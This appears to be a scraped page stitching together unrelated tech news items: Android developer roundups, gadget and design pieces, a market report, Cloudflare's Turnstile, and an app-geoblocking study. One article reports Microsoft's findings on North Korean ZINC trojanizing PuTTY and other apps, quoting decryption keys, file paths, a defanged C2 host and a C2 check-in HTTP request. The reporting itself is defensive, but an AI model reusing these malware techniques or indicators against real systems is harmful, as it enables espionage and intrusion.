All the Android development news from January 2021

How is 2021 shaping up so far? January has been eerily quiet so far. That said, we did get Unity 2021.1 beta, which offers a glimpse at the immediate future of mobile game development, along with a smattering of other developments. Read on for the full scoop.

News and features from Android Authority

What is Unity Development


News and features from the web

  • Unity 2021.1 beta is available for feedback — The biggest news this month is the beta release of Unity 2021.1. Developers will be able to play around with useful quality-of-life improvements, Point light Shadows via the Universal Render Pipeline, and a faster, more powerful editor. The most transformative update, however, comes in the form of Visual Scripting. This will enable creators from all backgrounds to implement basic logic without writing a line of code, similar to the tool seen in Unreal Engine. Let us know in the comments below if you’d like more of a deep dive into this in the future.
  • Unreal Engine 4.25 released! — While this is actually news from December, it seems only fair to mention that Unity 2021.1 comes on the heals of Unreal Engine 4.26. While most mobile developers gravitate toward Unity for its ease-of-use, Unreal is still widely used. The new release brought more realistic animated characters with better strand-based hair and fur rendering, a Volumetric Cloud component for a believable atmosphere, and more.
  • A Performance Heads-Up Display (HUD) for Chrome — Google announced that it will be bringing a “Performance Heads-Up Display” for Chrome. This will let developers see data from the Core Web Vitals extension and will work on Android too. That includes First Input Delay and Largest Contentful Paint to optimize website performance. If it leads to a faster and more efficient internet experience, it can only be a good thing!

All the Android developer news from February 2021

Android Developer Monthly

android 12 developer preview 1 quick settings media notification

Numerous orgs hacked after installing weaponized open source apps

Numerous orgs hacked after installing weaponized open source apps

Getty Images

Hackers backed by the North Korean government are weaponizing well-known pieces of open source software in an ongoing campaign that has already succeeded in compromising “numerous” organizations in the media, defense and aerospace, and IT services industries, Microsoft said on Thursday.

ZINC—Microsoft’s name for a threat actor group also called Lazarus, which is best known for conducting the devastating 2014 compromise of Sony Pictures Entertainment—has been lacing PuTTY and other legitimate open source applications with highly encrypted code that ultimately installs espionage malware.

The hackers then pose as job recruiters and connect with individuals of targeted organizations over LinkedIn. After developing a level of trust over a series of conversations and eventually moving them to the WhatsApp messenger, the hackers instruct the individuals to install the apps, which infect the employees’ work environments.


“The actors have successfully compromised numerous organizations since June 2022,” members of the Microsoft Security Threat Intelligence and LinkedIn Threat Prevention and Defense teams wrote in a post. “Due to the wide use of the platforms and software that ZINC utilizes in this campaign, ZINC could pose a significant threat to individuals and organizations across multiple sectors and regions.”

PuTTY is a popular terminal emulator, serial console, and network file transfer application that supports network protocols, including SSH, SCP, Telnet, rlogin, and raw socket connection. Two weeks ago, security firm Mandiant warned that hackers with ties to North Korea had Trojanized it in a campaign that successfully compromised a customer’s network. Thursday’s post said the same hackers have also weaponized KiTTY, TightVNC, Sumatra PDF Reader, and muPDF/Subliminal Recording software with code that installs the same espionage malware, which Microsoft has named ZetaNile.

Lazarus was once a ragtag band of hackers with only marginal resources and skills. Over the past decade, its prowess has grown considerably. Its attacks on cryptocurrency exchanges over the past five years have generated billions of dollars for the country’s weapons of mass destruction programs. They regularly find and exploit zero-day vulnerabilities in heavily fortified apps and use many of the same malware techniques used by other state-sponsored groups.

The group relies primarily on spear phishing as the initial vector into its victims, but they also use other forms of social engineering and website compromises at times. A common theme is for members to target the employees of organizations they want to compromise, often by tricking or coercing them into installing Trojanized software.

The Trojanized PuTTY and KiTTY apps Microsoft observed use a clever mechanism to ensure that only intended targets get infected and that it doesn’t inadvertently infect others. The app installers don’t execute any malicious code. Instead, the ZetaNile malware gets installed only when the apps connect to a specific IP address and use login credentials the fake recruiters give to targets.

The Trojanized PuTTY executable uses a technique called DLL search order hijacking, which loads and decrypts a second-stage payload when presented with the key “0CE1241A44557AA438F27BC6D4ACA246” for use as command and control. Once successfully connected to the C2 server, the attackers can install additional malware on the compromised device. The KiTTY app works similarly.

Similarly, the malicious TightVNC Viewer installs its final payload only when a user selects ec2-aet-tech.w-ada[.]amazonaws from the drop-down menu of pre-populated remote hosts in the TightVNC Viewer.


Thursday’s post continued:

The trojanized version of Sumatra PDF Reader named SecurePDF.exe has been utilized by ZINC since at least 2019 and remains a unique ZINC tradecraft. SecurePDF.exe is a modularized loader that can install the ZetaNile implant by loading a weaponized job application themed file with a .PDF extension. The fake PDF contains a header “SPV005”, a decryption key, encrypted second stage implant payload, and encrypted decoy PDF, which is rendered in the Sumatra PDF Reader when the file is opened.

Once loaded in memory, the second stage malware is configured to send the victim’s system hostname and device information using custom encoding algorithms to a C2 communication server as part of the C2 check-in process. The attackers can install additional malware onto the compromised devices using the C2 communication as needed.


The post went on:

Within the trojanized version of muPDF/Subliminal Recording installer, setup.exe is configured to check if the file path ISSetupPrerequisitesSetup64.exe exists and write C:colrctlcolorui.dll on disk after extracting the embedded executable inside setup.exe. It then copies C:WindowsSystem32ColorCpl.exe to C:ColorCtrlColorCpl.exe. For the second stage malware, the malicious installer creates a new process C:colorctrlcolorcpl.exe C3A9B30B6A313F289297C9A36730DB6D, and the argument C3A9B30B6A313F289297C9A36730DB6D gets passed on to colorui.dll as a decryption key. The DLL colorui.dll, which Microsoft is tracking as the EventHorizon malware family, is injected into C:WindowsSystemcredwiz.exe or iexpress.exe to send C2 HTTP requests as part of the victim check-in process and to get an additional payload.

POST /support/support.asp HTTP/1.1
Cache-Control: no-cache
Connection: close
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64;
Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729;
InfoPath.3; .NET4.0C; .NET4.0E)
Content-Length: 125
Host: www.elite4print[.]com

bbs=[encrypted payload]= &article=[encrypted payload]

The post provides technical indicators that organizations can search for to determine if any endpoints inside their networks are infected. It also includes IP addresses used in the campaign that admins can add to their network block lists.

Vulgar remark in TikTok gets Apple’s procurement VP fired

AppleInsider is supported by its audience and may earn commission as an Amazon Associate and affiliate partner on qualifying purchases. These affiliate partnerships do not influence our editorial content.

Apple Vice President Tony Blevins is being shown the door at Apple after he made a crude comment in a viral video on TikTok.

TikTok and Instagram creator Daniel Mac had approached Blevins for his series where he asks expensive car owners about their job. Mac stopped the executive while he was parking a Mercedes-Benz SLR McLaren, a car that can sell for hundreds of thousands of dollars.

The video, published on September 5, shows Blevins answering the question of what he does for a living.

“I have rich cars, play golf and fondle big-breasted women, but I take weekends and major holidays off,” he said. Blevins also mentioned his “hell of a dental plan” which, presumably, he will be losing.

Tony Blevins in TikTok video

Tony Blevins in TikTok video

The video got over 40,000 likes on Instagram and 1.3 million views on TikTok. The clip was found by some employees of Apple’s operations and procurement teams that Blevins heads as vice president.

The employees reported the TikTok to Apple’s human resources department, which then opened an investigation. The video also spread to employees and some of Apple’s important suppliers.

Jeff Williams, the company’s Chief Operating Officer, has been Blevins’s boss for most of the executive’s 22-year stint at the company. Williams reportedly made the decision that Blevins had to go, and is assuming his duties.

In a statement to Bloomberg, Blevins confirmed the incident, saying it happened on August 18. “I would like to take this opportunity to sincerely apologize to anyone who was offended by my mistaken attempt at humor,” he said.

During his tenure at Apple, Blevins, known as “The Blevinator” led negotiations over cellular modems with Qualcomm and Intel, and has helped lower the costs of important parts in Apple’s devices. He recently worked with Apple’s satellite agreement with Globalstar.

A report in 2020 detailed Blevins as a relentless and sometimes ruthless negotiator who stopped at nothing to ensure Apple a favorable deal.

Dolfi is a tiny ultrasonic washing machine for your clothes

Product designer Andre Fangueiro has created a small pebble-shaped device that uses ultrasonic sound waves to clean clothes (+ movie).

Andre Fangueiro, founder of Netherlands firm Studio Lata, partnered with engineers at Swiss firm MPI Ultrasonics and new company Dolfi to design a portable machine for washing textiles using ultrasound.

Dolfi washing machine by Andre Fangueiro

The product – also called Dolfi – aims to remove the need for hand-washing clothes made from fabrics like silk, cashmere and lace that are easily damaged, as well as offer travellers a portable cleaning option.

“The idea of Dolfi came after a few terrible experiences with laundry during my extensive travel,” said Dolfi founder Lena Solis, who commissioned Fangueiro to design the product.

Dolfi washing machine by Andre Fangueiro

“I believe that ultrasonic technology will change the way we wash,” she added.

According to the designers, once the Dolfi is placed in a sink or container filled with water and switched on, a device inside it known as a transducer converts electrical power into a range of high-frequency soundwaves that create millions of tiny bubbles in the liquid – an action known as cavitation.

Dolfi washing machine by Andre Fangueiro

These bubbles implode in on themselves, generating jets that drive detergent and water through the fibres of a piece of clothing without the need for extra movement.

Subscribe to Dezeen’s YouTube channel for the latest architecture and design movies

Fangueiro created a smooth white plastic pebble to house the transducer. The pebble is sealed to make it waterproof and is attached to an electric power source via a flexible cable.

Dolfi washing machine by Andre Fangueiro

“Its smooth form provides the end user with the sense of friendliness and security that this object would help wash their most precious textiles,” said Fanguerio.

“The curvature and acceleration of the surfaces are designed to communicate a high-end consumer product within its technological size. The end result is the small-size, hand-held product that is both high-tech and high-performing.”

Dolfi washing machine by Andre Fangueiro

Ultrasonic processes are widely used for cleaning objects made from more solid materials, like jewellery and dental equipment.

Swiss company MPI Ultrasonics developed a range of frequencies that are suitable for cleaning textiles. MPI’s Multifrequency, Multimode, Modulated Sonic & Ultrasonic Vibrations technology can be used for a number of different purposes, as the waves it generates can be tuned to suit different materials and functions.

Dolfi washing machine by Andre Fangueiro

“The precisely modulated ultrasonic waves tackle dirt and bacteria right down to the microscopic level. This revolutionary method is able to clean clothing from the inside out without ever damaging or discolouring the fabric,” said a statement from Dolfi.

“This compact but powerful device consumes about 80 times less energy than a conventional washing machine, helping you make a huge positive impact for the planet and, of course, for your wallet.”

Dolfi washing machine by Andre Fangueiro

Dolfi’s name is a “tribute to dolphins”, animals the company describes as “the most advanced users of ultrasound”.

Dolfi will launch a crowdfunding campaign to raise $100,000 (£66,000) for production of the device on online platform IndieGogo later this month. A portion of the funds will be donated towards dolphin research and welfare organisations.

Global mobile cloud market size is expected to reach $202 Bn by 2028, CIOSEA News, ETCIO SEA

Global mobile cloud market size is expected to reach $202 Bn by 2028 announces the release of the report “Global Mobile Cloud Market Size, Share & Industry Trends Analysis Report By Application Type, By Deployment, By Regional Outlook and Forecast, 2022 – 2028″.

Cloud computing is used by mobile clouds to deliver applications to mobile devices.

The outlook for the mobile cloud market has changed as a result of developments in wireless technology, cloud computing, and multimodal communication. Three crucial deployment models have been included in mobile clouds including public, private, and hybrid, which offer services based on the needs of subscribers. Users have better access to real-time mobile services and the ability to run sophisticated applications due to the mobile cloud.

It has aided businesses in expanding their markets, lowering costs through improved scalability, and boosting revenues. Delivering mobile apps and services to a mobile device from a centralized data center is a part of the mobile cloud market. Mobile cloud services are primarily used by business users because they improve scalability, availability, and reliability for them. Cloud and mobile technologies have seen significant growth in recent years.

Worldwide, mobile communications have drastically changed how businesses operate. Cloud computing has simultaneously changed how services are delivered and how IT infrastructure is maintained. The development of mobile cloud market solutions has been facilitated by the convergence of mobile & cloud technology as well as the increasing use of connected mobile devices and the need for high computational power.

COVID-19 impact analysis

The adoption of 5G network deployments and other next-generation communication technologies has accelerated in many parts of the world, and service automation is a major concern. More than half of communication service providers are focusing on using cloud technology to increase operational service automation. These characteristics and the quickening pace of digitalization will lead to a rise in demand for the mobile cloud in the upcoming years. The fourth industrial revolution, known as Industry 4.0, is accelerating and altering how businesses use smart technologies such as big data, IoT, mobile supercomputing, and artificial intelligence.

Market growth factors

Usage of smartphones has increased

Smartphone use is gradually evolving into an effective teaching & learning tool for distance education. Its use guarantees flexible course delivery enabling students to use online learning platforms, access course materials, and communicate electronically. Presently, the usage of smartphones plays amazing roles in terms of education and learning. For instance, students can use learning management systems to quickly access information online to fulfill their information needs, access academic databases, and access a website.

Various healthcare apps are gaining popularity

The healthcare sector has undergone quick changes over time. A number of factors are accelerating the growth of healthcare cloud applications, which in turn may strengthen mobile cloud solutions and services over the forecast period. These include the emergence of new diseases, worldwide regulatory norm growth, population health management focus, inventions, and more informed customers. Additionally, small-scale advancements in the communication sector have led to the use of wireless communication modules for data transmission in medical devices, which enhances the healthcare management system.

Market restraining factors

Security and privacy issues associated with cloud

The main difficulties the mobile cloud market is facing are privacy and security issues. Smartphones are vulnerable to numerous security threats that intend to steal the users’ private information because of their constrained processing speed and memory. Additionally, there have been reports of third-party businesses selling sensitive private data to other organizations without the users’ consent. This has grown to be of the utmost importance to those involved in mobile security. Users store private information about their business and personal affairs in the cloud using cloud services.

Application type outlook

Based on application type, the mobile cloud market is segmented into entertainment, utilities, education, healthcare and others. In 2021, the entertainment segment dominated the mobile cloud market by generating the maximum revenue share. There are numerous sub-industries focused on entertainment under the broad umbrella term of the entertainment sector. The current entertainment market requires the publication of pertinent content in addition to the streaming of richly graphical content.

Deployment outlook

On the basis of deployment, the mobile cloud market is fragmented into public, private and hybrid. In 2021, the hybrid segment covered a substantial revenue share in the mobile cloud market. In all industries, the hybrid model has been the most widely used implementation strategy. Ingenious strategies and hybrid cloud models are increasingly being prioritized by many companies in order to maximize benefits while enhancing resource consumption, business operations, cost-effectiveness, user experience, and application modernization.

Regional outlook

Region wise, the mobile cloud market is analyzed across North America, Europe, Asia Pacific and LAMEA. The North America segment led the mobile cloud market with the largest revenue share in the mobile cloud market in 2021. The regional’s mobile cloud market is being driven by the quick advancements in technology for smart devices and the expansion of regional business operations. The region’s countries’ dominance can be attributed to their highly developed IT infrastructure, high rate of smart device adoption, and presence of major service providers.

The major strategies followed by the market participants are Partnerships. Based on the Analysis presented in the Cardinal matrix; Microsoft Corporation, Apple, Inc. and Google, Inc. are the forerunners in the Mobile Cloud Market. Companies such as, Inc., Oracle Corporation and Dell Technologies, Inc. are some of the key innovators in Mobile Cloud Market.

The market research report covers the analysis of key stake holders of the market. Key companies profiled in the report include Microsoft Corporation, Google LLC,, Inc., Dell Technologies, Inc., Apple, Inc.,, Inc., IBM Corporation, Oracle Corporation, Rackspace Technology, Inc., and Akamai Technologies, Inc.

All the Android developer news from February 2021

After a quiet January, February really kicked things off for developers with the release of Android 12 Developer Preview.

Android 12 DP is a very early version of the new operating system and (presumably) leaves a lot out. That said, there’s still plenty to unpack. Most important are a new copy-paste feature, wider media compatibility, and more consistency in the implementation of gestures.

February also brought us a host of other new tools, reports, and news. You’ll find everything you need to know right here.

News and Features From Android Authority

Android 12 logo on Google Pixel 3 3

Jimmy Westenberg / Android Authority

News and Features From Around the Web

All the Android development news from January 2021

Android Developer Monthly

What is Unity Development

All the Android developer news from March 2021

Android Developer Monthly

android 12 developer preview 1 android s version

Cloudflare’s CAPTCHA replacement lacks crosswalks, checkboxes, Google

CAPTCHAs are meant to prevent these kinds of browsing scenarios, not train us all to better recognize vehicles and infrastructure in grainy photos.
Enlarge / CAPTCHAs are meant to prevent these kinds of browsing scenarios, not train us all to better recognize vehicles and infrastructure in grainy photos.

Getty Images

Cloudflare has recently made an audacious claim: We could all be doing something better with our lives than deciding which images contain crosswalks or stop lights or clicking an “I’m not a robot” checkbox. Now the cloud services company is offering up a free CAPTCHA alternative, Turnstile, available to anyone, Cloudflare customer or not, and specifically calling out Google’s role in the existing “prove you’re a human” hegemony.

Turnstile utilizes Cloudflare’s Managed Challenge system, which takes cues from user behavior, browser data, and, on Apple devices, Private Access Tokens, to distinguish human visitors from bots and scripts. Cloudflare claims that its Managed Challenge system was able to reduce 91 percent of CAPTCHAs served to its customers’ visitors over a year.

Turnstile integrations run “a series of small non-interactive JavaScript challenges” to investigate the visitor, including proof of work and space, probing for web APIs, and “various other challenges for detecting browser-quirks and human behavior,” Cloudflare’s post states. The challenges vary by visitor, and machine learning can update the model with the common features of visitors who previously passed a test. The user only sees a “Verifying …” widget for a moment, then “Success!”

Note the lack of grid-aligned blurry images that make you feel like you're helping Skynet refine its targeting.

Note the lack of grid-aligned blurry images that make you feel like you’re helping Skynet refine its targeting.


Cloudflare claims that beyond annoyance and time-wasting, CAPTCHAs (which stands for “Completely Automated Public Turing test to tell Computers and Humans Apart”) are largely controlled by Google through its reCAPTCHA service. Google’s service had announced in 2017 that it would largely become invisible in newer versions, using the same browser and behavior hints about human-ness Cloudflare is touting to eliminate even the not-robot checkbox. One aspect of that proof that security researchers seemed to suss out: being logged in to a Google account.

“Google says they don’t use this information for ad targeting, but at the end of the day, Google is an ad sales company,” Cloudflare’s post states.

Google bought reCAPTCHA in 2009 and used it early on to solve problems like book digitization, Street View house numbers, and, as you’ve likely guessed, identifying objects like stairs, palm trees, taxis, and the like in image recognition tools. Cloudflare notes that CAPTCHA’s ubiquity is one of its strengths, as it has a steady, constantly updated base of solving and behavior data to lean on.

Google’s reCAPTCHA has offered an “invisible” mode in V2 since 2017 and a V3 that “will never interrupt your users.” Most Internet users still see their fair share of photo-picking grids and anti-robot checkboxes, likely due to sites and developers who haven’t upgraded to newer versions—or, potentially, seeming “suspicious” of an unknowable algorithm.

Cloudflare, originally a content-delivery network that has grown into security, hosting, and nearly every other aspect of cloud computing, cites its mission of “helping build a better Internet” as the reason it’s giving away a free verification service. The company, whose reverse proxy services are used by something close to 20 percent of all sites, has been in the news recently for its long debate on dropping hate site Kiwi Farms and deciding not to pull out of Russia after it invaded Ukraine.

Amazon reveals new Echo Dot, Kindle Scribe tablet & more

AppleInsider is supported by its audience and may earn commission as an Amazon Associate and affiliate partner on qualifying purchases. These affiliate partnerships do not influence our editorial content.

An Amazon product event is underway, and the company has unveiled a new stylus-based Kindle Scribe tablet, a refresh of the Echo Dot line, sleep monitoring hardware, and more.

New product updates include a fifth-generation Echo Dot with a clock and a Kindle with a stylus. Kindle’s offerings compete with Apple’s iPad and HomePod mini, but with budget-focused designs and hardware.

Outside of the updated Kindle, the new products center on the home and entertainment. Stay tuned to Amazon’s devices page as the new products are made available to purchase.

Kindle Scribe

The Amazon Kindle Scribe is the first-ever Kindle with a stylus. It has a 10.2-inch Paperwhite display with 300 pixels per inch resolution. The premium stylus is included with the purchase.

Use a stylus with a Kindle for the first time

Use a stylus with a Kindle for the first time

The pen has a dedicated eraser and a shortcut button. It attaches to the side of the Kindle magnetically when not in use.

Amazon says that the Kindle Scribe will get support for apps including the Microsoft Office suite in 2023. Users will be able to mark up Word documents, for example.

The Kindle Scribe launches later in 2022, “in time for the holidays,” for $339.99.

Halo Rise

Amazon announced the Halo Rise, a smart bedside sleep tracker, wake-up light, and alarm clock. It doesn’t have any cameras or microphones, but it tracks sleep patterns using built-in sensors.

The Halo Rise tracks sleep

The Halo Rise tracks sleep

Data from the Halo Rise is Alexa compatible so users can call up their sleep report on Alexa displays. The Halo Rise requires a subscription, but comes with six months bundled.

Echo Dot (5th-generation)

The new Amazon Echo Dot comes in black, beige, and dark blue. It has improved sound for clearer vocals and rich sound. Amazon says it has up to twice the bass.

The new Echo Dot has an optional clock

The new Echo Dot has an optional clock

There is a variant with a clock built into the speaker’s face. It shows through the mesh using white LEDs.

Echo Dots also act as Eero WiFi extenders. Each speaker can add up to 1,000 square feet of coverage to a network.

The kids’ edition Echo Dot also gets the 5th-generation update. New skins include an owl and a dragon.

Order the new Echo Dot for $50 or the Kids Edition for $60. The Kids Edition is bundled with a year of Amazon Kids Plus.

Amazon also announced a new Echo Studio with better bass and mid-range clarity. It comes in glacier white and costs $199.99, with orders shipping in October.

Echo Auto

Amazon announced an updated Echo Auto with more intelligence surrounding media playback and handoff. For example, music started in the home can pick up where it left off in the car.

BMW also made an appearance to announce its in-vehicle assistant will be based on Alexa.

Ring Spotlight Cam Pro

The Ring Spotlight Cam Pro has motion detection and the Birds Eye View feature. It can detect people or animals and show their walking path, but users can program it to ignore your pets.

The Ring Spotlight Cam Pro has the Birds Eye View feature

The Ring Spotlight Cam Pro has the Birds Eye View feature

It is available with solar, wired, or battery-operated variations. Only the battery and wired versions are out now for $230, with the solar option coming later in 2022 for $250.


Amazon announced the Fire TV Omni QLED TV. It has Dolby Vision IQ, HDR 10+, and adaptive brightness. It comes in 65-inch and 75-inch options with pre-orders starting at $800.

This Alexa-compatible TV enables users to show photos using voice commands.

The updated FireTV has an HDMI input for cable boxes

The updated FireTV has an HDMI input for cable boxes

The FireTV Cube has been updated with new hardware and an HDMI input for cable boxes. This cloth-covered box supports streaming 4K content over WiFi 6E.

The cable box input enables users to give Alexa commands to control the cable box. For example, tell Alexa to change the channel to a specific station.

Popcorn shoots from Jolene Carlier’s glass machine

This machine by Dutch designer Jolene Carlier spurts popcorn from the end of a glass tube into a bright yellow bowl when the snack is ready to eat (+ movie).

Popcorn Monsoon by Jolene Carlier

Popcorn Monsoon is a machine consisting of a pair of conical-shaped yellow bowls set into an oval wooden base – one heats to pop the corn while the other collects it. A curving glass tube fixed to the larger of the two receptacles delivers the popped corn into the smaller bowl.

The popcorn machine is the materialisation of one of 120 colourful drawings created by Jolene Carlier for her final project from Design Academy Eindhoven.

Popcorn Monsoon by Jolene Carlier

It was also inspired by a quote from the 1971 film Willy Wonka and the Chocolate Factory: “Come with me, and you’ll be in a world of pure imagination.”

Popcorn Monsoon by Jolene Carlier

“The drawings with which this project started were made to create a world of pure imagination that still makes sense in this one,” Carlier told Dezeen.

Popcorn Monsoon by Jolene Carlier

“Later on I find a function, one that fits but also surprises,” she added, explaining how this process is intended to turn the popular adage “form follows function” on its head.

Popcorn Monsoon by Jolene Carlier

“Most popcorn machines are very dull though the simple process of making popcorn is exciting.”

Popcorn Monsoon by Jolene Carlier

A small yellow ladle with angled sides is used to scoop kernels into a small glass funnel at one side of the machine.

Popcorn Monsoon by Jolene Carlier

A cork bung, which gives the apparatus a scientific appearance, blocks this exit route once the corn has been dispensed.

Popcorn Monsoon by Jolene Carlier

Hot air blown from beneath a grate in one of the two yellow basins pops the corn kernels and forces them up through the curved glass tube. The weight of the glass channel is supported at its crest by a metal hoop and rod affixed to the base.

The ready-to-eat popcorn falls into the second yellow bowl, which sits in a recess at the other end of the wooden stand.

Popcorn Monsoon by Jolene Carlier

“I considered making the glass tube more extreme or complicated but in the end decided the swirling of the popcorn was exciting enough,” said the designer. “When I saw the magic of the floating popcorn it made me so happy.”

Carlier has plans to convert further drawings into a range of products that will form a Pure Imagination collection, and is seeking to put the Popcorn Monsoon into production.

Film and photography is by Daantje Bons.

Commentary: Your phone apps could have higher security and privacy risks — depending on where you download them

Google and Apple have removed hundreds of apps from their app stores at the request of governments around the world, creating regional disparities in access to mobile apps at a time when many economies are becoming increasingly dependent on them.

The mobile phone giants have removed over 200 Chinese apps, including widely downloaded apps like TikTok, at the Indian government’s request in recent years.

Similarly, the companies removed LinkedIn, an essential app for professional networking, from Russian app stores at the Russian government’s request.

However, access to apps is just one concern. Developers also regionalise apps, meaning they produce different versions for different countries.

This raises the question of whether these apps differ in their security and privacy capabilities based on region.

In a perfect world, access to apps and app security and privacy capabilities would be consistent everywhere.

Popular mobile apps should be available without increasing the risk that users are spied on or tracked based on what country they’re in, especially given that not every country has strong data protection regulations.

My colleagues and I recently studied the availability and privacy policies of thousands of globally popular apps on Google Play, the app store for Android devices, in 26 countries.

We found differences in app availability, security and privacy.

While our study corroborates reports of takedowns due to government requests, we also found many differences introduced by app developers.

We found instances of apps with settings and disclosures that expose users to higher or lower security and privacy risks depending on the country in which they’re downloaded.


The countries and one special administrative region in our study are diverse in location, population and gross domestic product.

They include the United States, Germany, Hungary, Ukraine, Russia, South Korea, Turkey, Hong Kong and India. We also included countries like Iran, Zimbabwe and Tunisia, where it was difficult to collect data.

We studied 5,684 globally popular apps, each with over one million installs, from the top 22 app categories, including Books and Reference, Education, Medical, and News and Magazines.

Our study showed high amounts of geoblocking, with 3,672 of 5,684 globally popular apps blocked in at least one of our 26 countries.

Blocking by developers was significantly higher than takedowns requested by governments in all our countries and app categories. We found that Iran and Tunisia have the highest blocking rates, with apps like Microsoft Office, Adobe Reader, Flipboard and Google Books all unavailable for download.

We found regional overlap in the apps that are geoblocked.

In European countries in our study — Germany, Hungary, Ireland and the United Kingdom — 479 of the same apps were geoblocked.

Eight of those, including Blued and USA Today News, were blocked only in the European Union, possibly because of the region’s General Data Protection Regulation.

Turkey, Ukraine and Russia also show similar blocking patterns, with high blocking of virtual private network apps in Turkey and Russia, which is consistent with the recent upsurge of surveillance laws.

Of the 61 country-specific takedowns by Google, 36 were unique to South Korea, including 17 gambling and gaming apps taken down in accordance with the national prohibition on online gambling.

While the Indian government’s takedown of Chinese apps happened with full public disclosure, surprisingly, most of the takedowns we observed occurred without much public awareness or debate.


The apps we downloaded from Google Play also showed differences based on country in their security and privacy capabilities.

Among them, 127 apps varied in what they were allowed to access on users’ mobile phones, and 49 of which had additional permissions deemed “dangerous” by Google. Apps in Bahrain, Tunisia and Canada requested the most additional dangerous permissions.

Three virtual private network apps enable clear text communication in some countries, which allows unauthorised access to users’ communications.

Also, 118 apps varied in the number of ad trackers included in an app in some countries, with the categories Games, Entertainment and Social, with Iran and Ukraine having the most increases in the number of ad trackers compared to the baseline number common to all countries.

Separately, 103 apps have differences based on country in their privacy policies. Users in countries not covered by data protection regulations, such as General Data Protection Regulation in the EU and the California Consumer Privacy Act in the US, are at higher privacy risk.

For instance, 71 apps available from Google Play have clauses to comply with the General Data Protection Regulation only in the EU and the California Consumer Privacy Act only in the US. Twenty-eight apps that use dangerous permissions make no mention of it, despite Google’s policy requiring them to do so.


App stores allow developers to target their apps to users based on a wide array of factors, including their country and their device’s specific features.

Though Google has taken some steps toward transparency in its app store, our research shows that there are shortcomings in Google’s auditing of the app ecosystem, some of which could put users’ security and privacy at risk.

Potentially also as a result of app store policies in some countries, app stores that specialise in specific regions of the world are becoming increasingly popular.

However, these app stores may not have adequate vetting policies, thereby allowing altered versions of apps to reach users.

For example, a national government could pressure a developer to provide a version of an app that includes backdoor access. There is no straightforward way for users to distinguish an altered app from an unaltered one.

Our research provides several recommendations to app store proprietors to address the issues we found:

  • Better moderate their country targeting features
  • Provide detailed transparency reports on app takedowns
  • Vet apps for differences based on country or region
  • Push for transparency from developers on their need for the differences
  • Host app privacy policies themselves to ensure their availability when the policies are blocked in certain countries  THE CONVERSATION


The Conversation


Renuka Kumar is a PhD student in Computer Science and Engineering at the University of Michigan.